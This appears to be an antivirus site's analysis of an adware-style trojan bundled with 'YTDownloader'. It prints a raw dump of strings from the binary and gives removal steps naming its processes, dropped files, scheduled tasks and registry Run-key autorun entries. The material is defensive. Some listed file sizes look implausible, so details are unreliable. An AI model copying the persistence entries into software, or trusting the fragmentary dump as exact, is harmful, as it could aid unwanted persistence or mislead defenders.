SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
CRtmpParser::GetFieldDataString
CRtmpParser::GetFieldDataNumber
NetStream.Play.Reset
NetStream.Unpause.Notify
NetStream.Pause.Notify
NetStream.Seek.Notify
NetStream.Play.Stop
NetStream.Play.Failed
NetStream.Failed
()$^.* ?[]|\-{},:=!
video/WebM
"url_encoded_fmt_stream_map": "(.*?)"
rtmpe%3Dyes
url_encoded_fmt_stream_map=
%s, string reference, index: %d, not supported, ignoring!
%s - AMF3 unknown/unsupported datatype 0xx, @%p
AMF3_DATE reference: %d, not supported!
Property: <%s%s>
timestamp: %.2f, UTC offset: %d
INVALID TYPE 0xx
Property: <%sSTRICT_ARRAY>
Property: <%sECMA_ARRAY>
Property: <%sOBJECT>
AMF_Encode - failed to encode property in index %d
%s, invalid type. %d
%s, failed to decode AMF3 property!
Member: %s
Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d
Class reference: %d
Object reference, index: %d
%s: Empty buffer/no buffer pointer!
%s - unknown datatype 0xx, @%p
AMF_TYPED_OBJECT not supported!
AMF_REFERENCE not supported!
%s: Name size out of range: namesize (%d) > len (%d) - 2
%s: Not enough data for decoding with name, less than 4 bytes!
HTTP/1
%s, Setting socket timeout to %ds failed!
%s, No SSL/TLS support
HTTP_get
If-Modified-Since: %s
GET %s HTTP/1.0
User-Agent: %s
Host: %s
Mozilla/5.0
%s, d %s %d d:d:d GMT
size: x
date: %s
ctim: %s
url: %.*s
%s: couldn't open %s for writing, errno %d (%s)
%s: couldn't contact swfurl %s (HTTP error %d)
%s: swfurl %s not found
%s: connection lost while downloading swfurl %s
1.1.4
%s%s\.swfinfo
%s: %s
hXXp://
[[IMPORT]]
No application or playpath in URL!
Invalid port number!
No hostname in URL!
Parsed protocol: %d
RTMP URL: No :// in url!
NetConnection.confStream
NetStream.Publish.Start
NetStream.Play.UnpublishNotify
NetStream.Play.PublishNotify
NetStream.Play.Complete
NetStream.Play.Start
NetConnection.Connect.InvalidApp
NetStream.Play.StreamNotFound
NetStream.Authenticate.UsherToken
Publisher password
pubPasswd
Key for SecureToken response
Justin.tv authentication token
URL to player SWF file
swfUrl
URL of played media's web page
pageUrl
URL to played stream
tcUrl
DH public key does not fulfill y^q mod p = 1
DH public key must be at most p-2
DH public key must be at least 2
RC4 In Key:
RC4 Out Key:
%s: Couldn't calculate correct DH offset (got %d), exiting!
%s: Couldn't calculate correct digest offset (got %d), exiting
%s: Couldn't calculate DH offset (got %d), exiting!
%s: Couldn't calculate digest offset (got %d), exiting!
RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx
Connecting via SOCKS proxy: %s:%d
SWFSize : %u
live : %s
StopTime : %d msec
StartTime : %d msec
flashVer : %s
NetStream.Authenticate.UsherToken : %s
subscribepath : %s
auth : %s
pageUrl : %s
swfUrl : %s
tcUrl : %s
Playpath : %s
Port : %d
Protocol : %s
s %-7s %s
Unknown option %s
%s://%.*s:%d/%.*s
Problem accessing the DNS. (addr: %s)
%s, error
%s, Authentication failed: unknown auth mode: %s
%s, Authentication failed
%s, new app: %.*s tcUrl: %.*s playpath: %s
&nonce=%s&cnonce=%s&nc=%s&response=%s
%s, md5(%s:%s:%s:%s:%s:%s) =>
%s, md5(%s:/%.*s) =>
%s, md5(%s:%s:%s) =>
%s, pubToken1: %s
?%s&user=%s
%s, Authentication failed: no such user
%s, Authentication failed: wrong password
%s, pubToken2: %s
&challenge=%s&response=%s&opaque=%s
%s, b64(md5_2) = %s
%s, b64(%d) = %s
%s, b64(md5_1) = %s
%s, md5(%s%s%s) =>
%s, par:"%s" = val:"%s"
%s, need to set pubUser & pubPasswd for publisher auth
%s, wrong pubUser & pubPasswd for publisher auth
%-22.*s%s
%s, error decoding meta data packet
%s, received: chunk size change to %d
%s: server BW = %d
%s: client BW = %d %d
%s, recv returned %d. GetSockError(): %d (%s)
POST /%s%s/%d HTTP/1.1
Host: %.*s:%d
Content-length: %d
HTTP/1.1 200
%s, RTMP send error %d (%d bytes)
%s: fd=%d, size=%d
Invoking %s
sanity failed!! trying to send header of type: 0xx.
%s, failed to allocate packet
FCSubscribe: %s
UsherToken: %s
%s, %d, pauseTime=%d
%s, seekTime=%d, stopTime=%d, sending play: %s
sending ctrl. type: 0xx
%s: Ignoring SWFVerification request, use --swfVfy!
%s: SWFVerification Type %d request not supported! Patches welcome...
%s, SWFVerification ping received:
%s, Stream Begin %d
%s, Stream EOF %d
%s, Stream Dry %d
%s, Stream IsRecorded %d
%s, Ping %d
%s, Stream BufferEmpty %d
%s, Stream BufferReady %d
%s, Stream xx %d
%s, received ctrl. type: %d, len: %d
%s, RTMP socket closed by peer
%s, No valid HTTP response found
%s, failed to read RTMP packet body. len: %u
%s, failed to read extended timestamp
%s, failed to read RTMP packet header. type: %x
%s, m_nChannel: %0x
%s, failed to read RTMP packet header 3nd byte
%s, failed to read RTMP packet header 2nd byte
%s, failed to read RTMP packet header
%s: fd=%d
%s: client signature does not match!
%s: Handshaking finished....
%s: Genuine Adobe Flash Media Server
%s: Server not genuine Adobe!
%s: Signature calculated:
%s: Digest key:
%s: Server sent signature:
%s: Wait, did the server just refuse signed authentication?
%s: Client signature calculated:
%s: Calculated digest key from secure key and server digest:
%s: Secret key:
%s: Wrong secret key position!
%s: Server DH public key offset: %d
%s: FMS Version : %d.%d.%d.%d
%s: Server Uptime : %d
%s: Type mismatch: client sent %d, server answered %d
%s: Type Answer : X
%s: Initial client digest:
%s: Client digest offset: %d
%s: Couldn't write public key!
%s: Couldn't generate Diffie-Hellmann public key!
%s: DH pubkey position: %d
%s: Couldn't initialize Diffie-Hellmann!
%s: Client type: X
%s: Genuine Adobe Flash Player
%s: Client not genuine Adobe!
%s: Client sent signature:
%s: 2nd handshake:
%s: Sending handshake response:
%s: Server signature calculated:
%s: Client DH public key offset: %d
%s: Player Version: %d.%d.%d.%d
%s: Client Uptime : %d
%s: Initial server digest:
%s: Server digest offset: %d
%s: Unknown version x
%s: Type Requested : X
%s, RTMP connect failed.
%s, handshaked
%s, handshake failed.
%s, ... connected, handshaking
%s, Could not connect for handshake
%s, no SSL/TLS support
%s, SOCKS returned error code %d
%s, failed to create socket. Error: %d
%s, SOCKS negotiation failed.
%s ... SOCKS negotiation
%s, failed to connect socket. %d (%s)
Closing connection: %s
%s, onStatus: %s
trying to connect with redirected url
%s, error description: %s
%s, received error for method call <%s>
%s, received result id %f without matching request
%s, received result for method call <%s>
%s, server invoking <%s>
%s, error decoding invoke packet
%s, Sanity failed. no string method in invoke packet
%s, flex shared object, size %u bytes, not supported, ignoring
%s, flex message, size %u bytes, not fully supported
%s, received: notify %u bytes
%s, shared object, not supported, ignoring
%s, received: invoke %u bytes
%s, unknown packet type received: 0xx
%s, flex stream send, size %u bytes, not supported, ignoring
%s, received: bytes read report
Wrong data size (%u), stream corrupted, aborting!
Couldn't find the seeked keyframe in this chunk!
First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?
FLV Stream: Keyframe doesn't match!
Found keyframe with resume-keyframe timestamp!
Checked keyframe successfully!
ignoring too small audio packet: size: %d
ignoring too small video packet: size: %d
Got Play.Complete or Play.Stop from server. Assuming stream is complete
%s: Failed to close listening socket, error %d
Caught signal: %d, cleaning up, just a second...
-c, --cert cert RTMPS cert
-k, --key key RTMPS key
-p, --port port Overrides the port in the rtmp url
%s, _beginthread failed with %d
Unknown command '%c', ignoring
-o %s
-j "%s"
-p "%s"
-W "%s"
-f "%s"
-a "%s"
-r "%s"
%s, client invoking <%s>
%s, received packet type X, size %u bytes
%s: accept failed
%s: processed request
%s: accepted connection from %s
%s, listen failed
%s, TCP bind failed for port number: %d
%s, couldn't create socket
chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe
._-$,;~()
.mpeg
video/webm
.webm
.xslt
.json
audio/x-mpegurl
.torrent
.jpeg
.shtml
.shtm
.html
url_rewrite_patterns
ssl_certificate
listening_ports
index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
**.shtml$|**.shtm$
mydomain.com
**.cgi$|**.pl$|**.php$
SSL_CTX_use_certificate_chain_file
SSL_CTX_set_default_passwd_cb
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey_file
%s %s:
[0lu] [error] [client %s]
%.*s%s
%d-%3s-%d %d:%d:%d
%*3s, %d %3s %d %d:%d:%d
%d %3s %d %d:%d:%d
%d/%3s/%d %d:%d:%d
%[^:]:%[^:]:%s
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"
%s:%s:%s
%s.tmp
<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>
%d-%b-%Y %H:%M
**.htpasswd$
%s%c%s
%a, %d %b %Y %H:%M:%S GMT
HTTP/
%s: CGI env buffer truncated for [%s]
HTTP_%s=%s
REMOTE_USER=%s
PERLLIB=%s
SystemDrive=%s
SYSTEMROOT=%s
COMSPEC=%s
PATH_INFO=%s
PATH=%s
CONTENT_LENGTH=%s
QUERY_STRING=%s
CONTENT_TYPE=%s
HTTPS=%s
PATH_TRANSLATED=%s
SCRIPT_FILENAME=%s
SCRIPT_NAME=%.*s%s
REQUEST_URI=%s
REMOTE_PORT=%d
REMOTE_ADDR=%s
REQUEST_METHOD=%s
SERVER_PORT=%d
SERVER_PROTOCOL=HTTP/1.1
DOCUMENT_ROOT=%s
SERVER_ROOT=%s
SERVER_NAME=%s
Cannot SSI #exec: [%s]: %s
Bad SSI #exec: [%s]
HTTP/1.1 200 OK
<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>
HTTP/1.1 207 Multi-Status
%d.%d.%d.%d%n
%d.%d.%d.%d/%d%n
%lf%c
%s/%s
boundary=™s
HTTP/1.1 302 Found
Location: hXXps://%s:%d%s
24[^:]
%d.%d.%d.%d:%d%n
Cannot add SSL socket, is -ssl_certificate option set?
%s: %.*s: invalid port spec. Expecting list of: %s
[IP_ADDRESS:]PORT[s|p]
%s: cannot bind to %.*s: %s
set_ports_option
%s - %s [%s] "%s %s HTTP/%s" %d %I64d
%d/%b/%Y:%H:%M:%S %z
%s: subnet must be [ |-]x.x.x.x[/x]
Cannot open %s: %s
calloc(): %s
connect(%s:%d): %s
socket(): %s
gethostbyname(%s): %s
%s: %s is not allowed to connect
HTTP/1.1 %d %s
Content-Length: %d
Connection: %s
Error %d: %s
%s: CreateProcess(%s): %ld
%s%s%s\%s
%.*s%c%s
.htpasswd
fopen(%s): %s
%s: cannot open %s: %s
<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>
<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>
Error: opendir(%s): %s
Date: %s
Last-Modified: %s
Etag: %s
HTTP/1.1 100 Continue
Cannot create CGI pipe: %s
fopen: %s
CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]
Cannot spawn CGI process [%s]: %s
put_dir(%s): %s
HTTP/1.1 %d OK
Bad SSI #include: [%s]
Cannot open SSI #include: [%s]: fopen(%s): %s
%s: SSI tag is too large
%s: unknown SSI command: "%s"
SSI #include level is too deep (%s)
Method %s is not implemented
HTTP/1.1 301 Moved Permanently
Location: %s/
remove(%s): %s
Bad HTTP version
Bad HTTP version: [%s]
Invalid URI: [%s]
%s: option value cannot be NULL
Invalid option: %s
warning: %s: duplicate option
Hello from mongoose! Remote port: %d
HttpSendRequestW failed with error code
HttpOpenRequestW failed with error code
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Visual C   CRT: Not enough memory to complete call to strerror.
cmd.exe
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb
.?AVCHttp@@
<>"#{}|\^~[]`' ?&
.?AVCRtmpe@@
.?AV?$IBaseInterface@VIKeysBank@@@@
.?AVIKeysBank@@
.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@
.?AVCKeysBank@@
.?AVCRtmpDataProperty@@
.?AVCRtmpPacket@@
.?AVCRtmpParser@@
.?AVChromeBrowserWindow@@
.?AVFirefoxBrowserWindow@@
.?AVOperaBrowserWindow@@
HTTP://
.?AVHttpParser@@
.?AVCHttpDownload@@
zcÁ
WinExec
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjectsEx
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegEnumKeyA
RegOpenKeyExA
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
LIBEAY32.dll
HttpEndRequestW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
VERSION.dll
CertGetNameStringW
CertFreeCertificateContext
CryptMsgClose
CertCloseStore
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
PSAPI.DLL
IsValidURL
urlmon.dll
GdiplusShutdown
gdiplus.dll
GetCPInfo
GetProcessHeap
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
Content-Disposition: form-data; name="%s"
XXX
Content-Type: multipart/form-data; boundary=%s
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
ConfigDB.dll
config.xml
%%X
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
CertGetNameString failed.
CryptDecodeObject failed with %x
CertFindCertificateInStore failed with %x
MoreInfo Link : %s
Publisher Link : %s
Program Name : %s
CryptMsgGetParam failed with %x
CryptQueryObject failed with %x
user32.dll
WININET.DLL
kernel32.dll
d/d/%d d:d:d::d
%d.%d.%d.%d
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
"%s" "%s"
"%s" %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPPipeName] Name: %s
PipeName
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey
[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CClientRtmpe::operator =] Key Out: %p
[CClientRtmpe::operator =] Key In:
[CClientRtmpe::operator =]
[CClientRtmpe::OnHandshake] Step 3 - update the keystreams
[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 2 - Client version: %x
[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d
[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d
[CKeysBank::Work] Exit...
[CKeysBank::Work] Enter...
[CKeysBank::Start]
[CKeysBank::Stop]
[CKeysBank::GetPublicKey] Remove Key, Total: %d
[CKeysBank::GenerateKey] Add Key, Total: %d
[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey
[CKeysBank::GenerateKey] ___Error DiffieHellman.Init
[CRtmpe::operator =] Key Out: %p
[CRtmpe::operator =] Key In:
[CRtmpe::operator =]
[CRtmpe::Initialize] Cache Writer: %p
[CRtmpe::ParseHeader] Protocol - RTMPE
[CRtmpe::ParseHeader] Protocol - RTMP
[CRtmpe::ParseHeader]
[CRtmpe::ParseData] Got all %d/%d bytes
[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpe::ParseData]
[CRtmpe::Encrypt] Encryped %d bytes, Key: %p
[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p
[CRtmpe::ParseBuffer] Analyze Next Packet...
[CRtmpe::HandShake] Step 1: Complete
[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server
[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey
[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CRtmpe::HandShake] Step 1: Start...
[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes
[CRtmpe::UpdateBuffer] Handshake already completed
[CRtmpe::UpdateBuffer] Analyzing %d bytes...
[CRtmpStream::OnHandShake] ___Error - Unknown step
[CRtmpe::OnHandshake] Step 3 - Complete
[CRtmpe::OnHandshake] Step 3 - update the keystreams
[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption
[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey
[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CRtmpe::OnHandshake] ___Error Step 3: Writing client response
[CRtmpe::OnHandshake] Step 3: Start...
[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***
[CRtmpe::OnHandshake] ___Warning - server version
[CRtmpe::OnHandshake] ___Error Step 2: Reading server response
[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***

sma.exe_2100:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    smu.exe:2964
    smu.exe:3720
    smu.exe:2764
    BROWSE~2.EXE:3272
    BrowserHelper.exe:1284
    sc.exe:3048
    sc.exe:3252
    sc.exe:2908
    sc.exe:364
    wscript.exe:3544
    net1.exe:3620
    net1.exe:3204
    %original file name%.exe:1736
    net.exe:3184
    net.exe:3552
    ins_ytd.exe:2552
    DC%original file name%.exe:232
    DC%original file name%.exe:1276
    nsB.tmp:2636
    sma.exe:4012
    sma.exe:4024
    sma.exe:2100
    sma.exe:4028
    sma.exe:3160
    setup.exe:2860
    tcpsvcs.exe:2536
    tcpsvcs.exe:2284
    find.exe:2092

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Temp\vup.tmp (94 bytes)
    %Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)
    %WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (35967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (380759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (35001 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (1824812 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (164931 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss5.tmp (176533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (14 bytes)
    %WinDir%\Tasks\Inst_Rep.job (876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\bxsdk32.dll (2386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\ins_ytd.exe (61832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KAHI9BF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ABGH4T4P\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GZQNMLYL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2N3SX0SU\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (6 bytes)
    %WinDir%\Tasks\YTDownloader.job (942 bytes)
    %Program Files%\YTDownloader\rtmpdump.exe (19592 bytes)
    %Program Files%\YTDownloader\YTDownloader.exe (64932 bytes)
    %Program Files%\YTDownloader\DownloadAPI.dll (70495 bytes)
    %Program Files%\YTDownloader\Unelevate.exe (3312 bytes)
    %Program Files%\YTDownloader\BrowserHelper.exe (16424 bytes)
    %Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
    %Program Files%\YTDownloader\BrowserHelperSrv.exe (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoD.tmp (275210 bytes)
    %Program Files%\YTDownloader\Updater.exe (25824 bytes)
    %Program Files%\YTDownloader\download_ani.gif (9 bytes)
    %Program Files%\YTDownloader\DownloadHelper.exe (13584 bytes)
    %Program Files%\YTDownloader\AniGIF.ocx (6360 bytes)
    %Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\ssleay32.dll (7192 bytes)
    %Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\sbmntr.sys (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (11 bytes)
    %Program Files%\YTDownloader\libeay32.dll (33455 bytes)
    %Program Files%\YTDownloader\YTDUninstall.exe (20624 bytes)
    %Program Files%\YTDownloader\Download_completed.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (4 bytes)
    %Program Files%\YTDownloader\convert_ani.gif (784 bytes)
    %Program Files%\YTDownloader\converter.exe (68799 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (9320 bytes)
    %WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (4 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso8.tmp (244481 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (11 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (6 bytes)
    %WinDir%\Tasks\SMWPUpd.job (2154 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
